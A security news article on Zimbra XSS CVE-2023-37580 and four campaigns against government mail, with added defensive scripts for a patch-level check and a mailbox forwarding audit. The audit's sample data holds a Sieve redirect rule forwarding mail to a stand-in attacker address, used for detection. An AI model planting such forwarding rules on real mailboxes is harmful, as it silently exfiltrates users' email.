Zimbra XSS vulnerability exploited by hackers to steal government emails

published: Nov. 16, 2023

Take action: If you run Zimbra Collaboration Suite, update to the latest version of the software as soon as possible. The exploit is delivered through phishing emails, and with enough users some will inevitably click the link.

Learn More

Google's Threat Analysis Group (TAG) reports that an XSS vulnerability in the Zimbra Collaboration email software is being exploited by four distinct threat actors to steal email data, user credentials, and authentication tokens from government entities. Most of this activity took place after the fix had been made public in Zimbra's GitHub repository, and three of the four campaigns began before the official patch was released.

Zimbra Collaboration Suite is widely used by government entities worldwide, and it has previously been attacked through a similar XSS vulnerability.

This vulnerability, tracked as CVE-2023-37580 (CVSS score 6.1), is a reflected cross-site scripting (XSS) issue in the Zimbra Classic Web Client. It affects Zimbra Collaboration (ZCS) 8 prior to version 8.8.15 Patch 41; Zimbra addressed it in July 2023.
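To turn the affected-version statement above into a check you can run on a server, here is an added example (not code from the article, Google TAG, or Zimbra) that parses the output of `zmcontrol -v` and reports whether a ZCS 8 install is at or beyond 8.8.15 Patch 41. The `Release ... , Patch 8.8.15_P41.` line format is assumed from typical `zmcontrol -v` output and should be verified against your own server; only the ZCS 8 threshold named on this page is encoded, so other release lines return `None` and must be compared against Zimbra's advisory by hand.

```python
import re
import subprocess

# Threshold stated in the article: ZCS 8 is affected prior to 8.8.15 Patch 41.
FIXED_ZCS8 = (8, 15, 41)  # (minor, micro, patch)

# Assumed format of the zmcontrol -v "Release" line, e.g.
#   Release 8.8.15.GA.3869.UBUNTU18.64 UBUNTU18_64 FOSS edition, Patch 8.8.15_P41.
# An unpatched install prints no "Patch ..." suffix at all.
_RELEASE_RE = re.compile(r"Release\s+(\d+)\.(\d+)\.(\d+)")
_PATCH_RE = re.compile(r"Patch\s+\d+\.\d+\.\d+_P(\d+)")


def parse_zmcontrol_version(text):
    """Return (major, minor, micro, patch) parsed from zmcontrol -v output.

    patch is 0 when no Patch level is reported (a GA install with no patches).
    """
    m = _RELEASE_RE.search(text)
    if not m:
        raise ValueError("no 'Release x.y.z' line found in zmcontrol output")
    p = _PATCH_RE.search(text)
    patch = int(p.group(1)) if p else 0
    return int(m.group(1)), int(m.group(2)), int(m.group(3)), patch


def is_patched_for_cve_2023_37580(text):
    """True if a ZCS 8 install is at 8.8.15 P41 or later, False if older.

    Returns None for other major versions: their fixed levels are not stated
    on this page, so consult Zimbra's advisory for those release lines.
    """
    major, minor, micro, patch = parse_zmcontrol_version(text)
    if major != 8:
        return None
    return (minor, micro, patch) >= FIXED_ZCS8


if __name__ == "__main__":
    try:
        # On a Zimbra host this is normally run as the zimbra user.
        out = subprocess.run(["zmcontrol", "-v"], capture_output=True,
                             text=True, check=False).stdout
    except FileNotFoundError:
        # Constructed sample so the script also runs off-box.
        out = ("Release 8.8.15.GA.3869.UBUNTU18.64 UBUNTU18_64 FOSS edition, "
               "Patch 8.8.15_P40.")
    status = is_patched_for_cve_2023_37580(out)
    label = {True: "patched", False: "VULNERABLE, update now", None: "unknown release line"}
    print(f"{out.strip()}\n-> {label[status]}")
```

Note that a version check only tells you the XSS is closed; it says nothing about accounts that were already compromised while the server was unpatched, which is why the mailbox audit in the next section matters.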

Of the observed hacking campaigns, three of them exploited the vulnerability before the official patch was available, while the fourth initiated its campaign a month after the patches were published:

  1. The first campaign targeted a government organization in Greece, where threat actors sent emails containing exploit URLs to their targets. Clicking on the link during a logged-in Zimbra session would load a framework that enabled attackers to exploit the XSS issue to steal users' email data, including emails and attachments, and establish an auto-forwarding rule to redirect incoming messages to an attacker-controlled email address.
  2. A second threat actor began exploiting the vulnerability on July 11, before the official patch was released on July 25. These attackers focused on government organizations in Moldova and Tunisia, with each URL containing a unique official email address specific to organizations in those governments.
  3. A third, unidentified group exploited the vulnerability to steal credentials from a government organization in Vietnam. In this instance, the exploit URL directed users to a script displaying a phishing page to collect webmail credentials and post stolen credentials to a URL hosted on an official government domain that the attackers likely compromised.
  4. The fourth campaign, observed in August 2023, involved threat actors exploiting the vulnerability in an attack against a government organization in Pakistan, with the aim of stealing the Zimbra authentication token.
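The first campaign above persisted access by planting an auto-forwarding rule, which survives the victim closing the browser and even a password change. A sensible post-patch check is therefore to audit every mailbox for forwarding to addresses outside your own domains. The script below is an added example (not code from the article, Google TAG, or Zimbra): it parses the text that `zmprov ga <account> zimbraPrefMailForwardingAddress zimbraMailSieveScript` prints for one or more accounts, collects both the forwarding-address preference and any `redirect` actions in the account's Sieve script, and flags addresses whose domain is not on your internal list. The `# name account` block layout and the multi-line Sieve attribute are assumed from typical `zmprov ga` output; the sample input is constructed.

```python
import re

# Assumed zmprov ga layout: each account starts with "# name user@domain",
# followed by "attr: value" lines; multi-line values (the Sieve script)
# continue on the following lines until the next account header.
_ACCOUNT_HDR = "# name "
_FWD_PREF_RE = re.compile(r"^zimbraPrefMailForwardingAddress:\s*(\S+)", re.MULTILINE)
# Sieve redirect action, e.g.  redirect "collector@attacker.example";
_SIEVE_REDIRECT_RE = re.compile(r'\bredirect\s+"([^"]+)"')


def split_zmprov_accounts(text):
    """Map each account name to the raw attribute text that follows its header."""
    accounts, current, buf = {}, None, []
    for line in text.splitlines():
        if line.startswith(_ACCOUNT_HDR):
            if current is not None:
                accounts[current] = "\n".join(buf)
            current, buf = line[len(_ACCOUNT_HDR):].strip(), []
        elif current is not None:
            buf.append(line)
    if current is not None:
        accounts[current] = "\n".join(buf)
    return accounts


def forwarding_targets(block):
    """All addresses an account forwards to, from the pref and from Sieve redirects."""
    targets = {m.group(1).strip() for m in _FWD_PREF_RE.finditer(block)}
    targets |= {m.group(1).strip() for m in _SIEVE_REDIRECT_RE.finditer(block)}
    return targets


def find_external_forwards(zmprov_output, internal_domains):
    """Return {account: sorted external forwarding addresses} for accounts that
    forward anywhere outside internal_domains (case-insensitive domain match)."""
    internal = {d.lower() for d in internal_domains}
    findings = {}
    for account, block in split_zmprov_accounts(zmprov_output).items():
        external = sorted(
            addr for addr in forwarding_targets(block)
            # An address with no '@' has no domain and is treated as external.
            if addr.rsplit("@", 1)[-1].lower() not in internal or "@" not in addr
        )
        if external:
            findings[account] = external
    return findings


# Constructed sample of zmprov output; hostnames are illustrative only.
SAMPLE_ZMPROV_OUTPUT = """\
# name alice@ministry.example
zimbraPrefMailForwardingAddress: alice.archive@ministry.example

# name bob@ministry.example
zimbraPrefMailForwardingAddress: collector@attacker.example
zimbraMailSieveScript: require ["fileinto"];
if anyof (true) {
redirect "collector@attacker.example";
keep;
}

# name carol@ministry.example
zimbraMailSieveScript: require ["fileinto"];
if header :contains "subject" "invoice" {
fileinto "Finance";
}
"""

if __name__ == "__main__":
    # In practice feed this the real output, e.g. of:
    #   zmprov -l gaa | xargs -I{} zmprov ga {} zimbraPrefMailForwardingAddress zimbraMailSieveScript
    for account, addrs in find_external_forwards(
            SAMPLE_ZMPROV_OUTPUT, {"ministry.example"}).items():
        print(f"{account}: forwards to external {', '.join(addrs)}")
```

Any hit here is worth treating as an incident, not a configuration oddity: an external forward on a government mailbox that the user did not create means the session was already abused, and the attacker keeps receiving mail until the rule is removed and the user's sessions and tokens are invalidated.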
